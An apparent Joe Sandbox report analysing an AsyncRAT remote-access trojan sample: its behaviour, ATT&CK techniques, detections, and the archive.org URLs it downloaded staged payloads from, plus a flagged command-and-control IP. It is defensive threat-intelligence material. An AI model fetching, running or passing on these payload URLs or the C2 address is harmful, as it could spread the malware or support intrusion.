          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          Yara detected AsyncRAT
          Source: Yara match | File source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara match | File source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping | File and Directory Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Command and Scripting Interpreter (11) | Scheduled Task/Job (1) | Process Injection (212) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (14) | Remote Desktop Protocol | Email Collection (1) | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (1) | Scheduled Task/Job (1) | Obfuscated Files or Information (11) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Clipboard Data (1) | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder (1) | Software Packing (1) | NTDS | Security Software Discovery (121) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (2) | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Timestomp (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection (212) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          (Screenshot thumbnails are not reproduced in this text extract.)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          xGrfj8RvYg.exe | 9% | ReversingLabs | ByteCode-MSIL.Backdoor.Crysan

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          23.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
          23.0.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1121262
          25.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137914

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://crl.microsoft | 0% | URL Reputation | safe
          https://contoso.com/License | 0% | URL Reputation | safe
          https://ia601406.us.archive.org8 | 0% | Avira URL Cloud | safe
          https://contoso.com/ | 0% | URL Reputation | safe
          https://ia803408.us.archive.orgx | 0% | Avira URL Cloud | safe
          http://crl.goi | 0% | Avira URL Cloud | safe
          https://archive.orgx | 0% | Avira URL Cloud | safe
          http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
          http://microsoft.co | 0% | URL Reputation | safe
          https://go.micro | 0% | URL Reputation | safe
          https://contoso.com/Icon | 0% | URL Reputation | safe
          https://ia601406.us.archive.orgx | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ia601406.us.archive.org | 207.241.227.126 | true | false |  | high
          ia601509.us.archive.org | 207.241.227.119 | true | false |  | high
          archive.org | 207.241.224.2 | true | false |  | high
          ia601502.us.archive.org | 207.241.227.112 | true | false |  | high
          ia803408.us.archive.org | 207.241.232.198 | true | false |  | high

                    URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://ia601509.us.archive.org/ | powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmp | false |  | high
          https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7l | mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp | false |  | high
          http://crl.microsoft | powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://ia803408.us.archive.org | powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp | false |  | high
          http://certificates.godaddy.com/repository/0 | mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp | false |  | high
          https://contoso.com/License | powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt... | mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmp | false |  | high
          https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1 | mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp | false |  | high
          https://ia601406.us.archive.org8 | powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://archive.org | powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp | false |  | high
          https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0 | mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp | false |  | high
          http://ia601406.us.archive.org | powershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmp | false |  | high
          https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXT | powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmp | false |  | high
          https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt | powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp | false |  | high
          https://contoso.com/ | powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmp | false |  | high
          https://ia601509.us.archive.org/21/items/all-lol-123_20210603/AL | mshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp | false |  | high
          https://ia803408.us.archive.org | powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp | false |  | high
          https://ia803408.us.archive.orgx | powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://crl.goi | mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://certificates.godaddy.com/repository/gdig2.crt0 | mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp | false |  | high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://archive.orgxpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://crl.godaddy.com/gdig2s1-1597.crl0mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpfalse
                                                          high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://microsoft.copowershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://go.micropowershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://certs.godaddy.com/repository/1301mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpfalse
                                                              high
                                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtsmshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpfalse
                                                                high
                                                                https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtrmshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpfalse
                                                                  high
                                                                  https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtxxGrfj8RvYg.exe, 00000000.00000002.199598225.0000000002B51000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpfalse
                                                                    high
                                                                    https://certs.godaddy.com/repository/0mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://ia601406.us.archive.orgxpowershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://archive.orgpowershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://ia601406.us.archive.orgpowershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtomshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpfalse
                                                                              high
                                                                              https://ia601502.us.archive.org/mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpfalse
                                                                                high
                                                                                https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtC:mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpfalse
                                                                                  high
                                                                                  https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt0ywIpowershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ia601509.us.archive.orgpowershell.exe, 00000003.00000002.477168577.0000027D87BD2000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://crl.godaddy.com/gdroot-g2.crl0Fmshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpfalse
                                                                                        high
                                                                                        https://ia601509.us.archive.org/21/itemspowershell.exe, 00000003.00000003.207800027.0000027D9F706000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://ia601406.us.archive.org/9/items/server-lol-123_20210603/powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtfmshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpfalse
                                                                                              high
                                                                                              https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXTPowerShell_transcript.715575.7kfD7GZs.20210611063402.txt.3.dr, Clean_lol123[1].txt.2.drfalse
                                                                                                high
                                                                                                http://crl.godaddy.com/gdroot.crl0Fmshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://archive.org/download/run-02-02-02/Run_02_02_02.TXTpowershell.exe, 00000003.00000002.477635897.0000027D87D15000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478302181.0000027D87F6C000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtQmshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpfalse
                                                                                                      high
                                                                                                      https://ia803408.us.archive.org/9/items/run-02-02-02/Run_02_02_02.TXTpowershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtmshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp, xGrfj8RvYg.exefalse
                                                                                                          high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
207.241.227.119 | ia601509.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.232.198 | ia803408.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.227.126 | ia601406.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.227.112 | ia601502.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.224.2 | archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
216.230.75.62 | unknown | United States | 13886 | CLOUD-SOUTHUS | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433020
Start date: 11.06.2021
Start time: 06:33:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: xGrfj8RvYg.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.evad.winEXE@12/12@5/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 25% (good quality ratio 25%)
• Quality average: 90%
• Quality standard deviation: 0%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 168.61.161.212, 20.82.210.154, 23.218.208.56, 2.20.142.209, 2.20.142.210, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.209.183
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/433020/sample/xGrfj8RvYg.exe

Simulations

Behavior and APIs

Time | Type | Description
06:34:03 | API Interceptor | 74x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
207.241.227.119 | 8KfPvyojv5.exe | malicious
207.241.227.119 | Appraisa.vbs | malicious
207.241.232.198 | 8KfPvyojv5.exe | malicious
207.241.227.126 | 8KfPvyojv5.exe | malicious
207.241.227.126 | Appraisal.vbs | malicious
207.241.227.126 | Receipt.vbs | malicious
207.241.227.126 | Appraisal.vbs | malicious
207.241.227.126 | Property.Report.vbs | malicious
207.241.227.126 | Appraisal.reportl1100445269900.vbs | malicious
207.241.227.126 | Appraisal.vbs | malicious
207.241.227.126 | CONTRACT AGRREMENT FORM.ppt | malicious
207.241.227.126 | Invoice ID-(684472).vbs | malicious
207.241.227.126 | https://www.landpage.co/dd35d882-3317-11eb-a937-86a082cbe859/button/iOPaW1TDD2TG7oPdiBfDIfd6Oy6XO9BJ | malicious
207.241.227.112 | Appraisal.vbs | malicious
207.241.227.112 | JZ74.vbs | malicious
207.241.227.112 | b44c460b_by_Libranalysis.xlsm | malicious
207.241.227.112 | 78a4d352_by_Libranalysis.xlsm | malicious
207.241.227.112 | a423d144_by_Libranalysis.xlsm | malicious
207.241.227.112 | NEW PO - CE AUSTRALIA PTY LTD.xls | malicious
207.241.227.112 | OB74.vbs | malicious
207.241.227.112 | PO737383866366363.pps | malicious
207.241.227.112 | ITEM LIST.ppt | malicious
207.241.227.112 | RFQ No3756368.ppt | malicious
207.241.227.112 | sample.ppt | malicious
207.241.227.112 | RFQ No3756368.ppt | malicious
207.241.227.112 | PO944888299393.pps | malicious
207.241.227.112 | Purchase Order WT-7011 List.xls | malicious
207.241.227.112 | New Purchase Order RFQ List - Copy.xls | malicious
207.241.227.112 | Payment Advice PDF.ppt | malicious
207.241.227.112 | New Orders PDF.pps | malicious
207.241.227.112 | New Purchase Order.xls | malicious
207.241.227.112 | Invoice ID-(684472).vbs | malicious
207.241.224.2 | 8KfPvyojv5.exe | malicious
207.241.224.2 | Appraisal.report.vbs | malicious
207.241.224.2 | Z0PVKGyuxF.exe | malicious
207.241.224.2 | 22f76723_by_Libranalysis.xlsm | malicious
207.241.224.2 | Appraisal.reportl1100445269900.vbs | malicious
                                                                                                                                                                                    PO737383866366363.ppsGet hashmaliciousBrowse
                                                                                                                                                                                      sample.pptGet hashmaliciousBrowse
                                                                                                                                                                                        PO944888299393.ppsGet hashmaliciousBrowse
                                                                                                                                                                                          PO -28001 X67533AB.pptGet hashmaliciousBrowse
                                                                                                                                                                                            0901e76c84536f06b_2500332020005403099_0901e76c4489e546f06b_250020214405500030995.WsFGet hashmaliciousBrowse
                                                                                                                                                                                              RFQ P39948220.pptGet hashmaliciousBrowse
                                                                                                                                                                                                Order 100920-0087.ppsGet hashmaliciousBrowse
                                                                                                                                                                                                  OrderSheet.ppsGet hashmaliciousBrowse
                                                                                                                                                                                                    FK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      spectrum-statement-bill-7214213.DOCX.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                        TK29.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          NR52.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                            Statement-ID-(8247412).vbsGet hashmaliciousBrowse
                                                                                                                                                                                                              Invoice-ID-(5519012341210).vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                Contract document.pptGet hashmaliciousBrowse

Domains

Match | Associated Sample Name / URL | Detection | Context (IP)
ia601502.us.archive.org | Appraisal.vbs | malicious | 207.241.227.112
 | JZ74.vbs | malicious | 207.241.227.112
 | b44c460b_by_Libranalysis.xlsm | malicious | 207.241.227.112
 | 78a4d352_by_Libranalysis.xlsm | malicious | 207.241.227.112
 | a423d144_by_Libranalysis.xlsm | malicious | 207.241.227.112
 | NEW PO - CE AUSTRALIA PTY LTD.xls | malicious | 207.241.227.112
 | OB74.vbs | malicious | 207.241.227.112
 | PO737383866366363.pps | malicious | 207.241.227.112
 | ITEM LIST.ppt | malicious | 207.241.227.112
 | RFQ No3756368.ppt | malicious | 207.241.227.112
 | TAX Statement.ppt | malicious | 207.241.227.112
 | sample.ppt | malicious | 207.241.227.112
 | RFQ No3756368.ppt | malicious | 207.241.227.112
 | PO944888299393.pps | malicious | 207.241.227.112
 | Purchase Order WT-7011 List.xls | malicious | 207.241.227.112
 | New Purchase Order RFQ List - Copy.xls | malicious | 207.241.227.112
 | Payment Advice PDF.ppt | malicious | 207.241.227.112
 | New Orders PDF.pps | malicious | 207.241.227.112
 | New Purchase Order.xls | malicious | 207.241.227.112
archive.org | 8KfPvyojv5.exe | malicious | 207.241.232.198
 | Report.110034567733.vbs | malicious | 207.241.227.116
 | Report.vbs | malicious | 207.241.227.118
 | Appraisal.vbs | malicious | 207.241.227.128
 | Receipt.vbs | malicious | 207.241.227.123
 | Qgc2Nreer3.exe | malicious | 207.241.224.2
 | Appraisal.vbs | malicious | 207.241.227.112
 | 8b664227_by_Libranalysis.ppt | malicious | 207.241.228.148
 | KUP ZAMÓWIENIE-34002174.ppt | malicious | 207.241.228.148
 | 280fdaa5_by_Libranalysis.ppt | malicious | 207.241.228.148
 | Property.Report.vbs | malicious | 207.241.227.110
 | VCKBY846628.vbs | malicious | 207.241.227.118
 | Appraisal.report.vbs | malicious | 207.241.228.142
 | NEW PO - CE AUSTRALIA PTY LTD.xls | malicious | 207.241.228.147
 | 2513bdc6_by_Libranalysis.xlsm | malicious | 207.241.227.127
 | PO.xls | malicious | 207.241.228.147
 | Purchase Order-1245102021.xls | malicious | 207.241.227.127
 | Z0PVKGyuxF.exe | malicious | 207.241.228.158
 | JZ74.vbs | malicious | 207.241.227.112
 | b44c460b_by_Libranalysis.xlsm | malicious | 207.241.227.112
ia601406.us.archive.org | 8KfPvyojv5.exe | malicious | 207.241.227.126
 | Appraisal.vbs | malicious | 207.241.227.126
 | Receipt.vbs | malicious | 207.241.227.126
 | Appraisal.vbs | malicious | 207.241.227.126
 | Property.Report.vbs | malicious | 207.241.227.126
 | Appraisal.reportl1100445269900.vbs | malicious | 207.241.227.126
 | Appraisal.vbs | malicious | 207.241.227.126
 | CONTRACT AGRREMENT FORM.ppt | malicious | 207.241.227.126
 | Invoice ID-(684472).vbs | malicious | 207.241.227.126
 | https://www.landpage.co/dd35d882-3317-11eb-a937-86a082cbe859/button/iOPaW1TDD2TG7oPdiBfDIfd6Oy6XO9BJ | malicious | 207.241.227.126
ia601509.us.archive.org | 8KfPvyojv5.exe | malicious | 207.241.227.119
 | Purchase Order-1245102021.xls | malicious | 207.241.227.119
 | Appraisa.vbs | malicious | 207.241.227.119

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
INTERNET-ARCHIVEUS | 8KfPvyojv5.exe | Get hash | malicious | Browse | 207.241.227.121
 | Report.110034567733.vbs | Get hash | malicious | Browse | 207.241.227.125
 | Report.vbs | Get hash | malicious | Browse | 207.241.227.110
 | Appraisal.vbs | Get hash | malicious | Browse | 207.241.227.126
 | Receipt.vbs | Get hash | malicious | Browse | 207.241.227.123
 | Appraisal.vbs | Get hash | malicious | Browse | 207.241.227.112
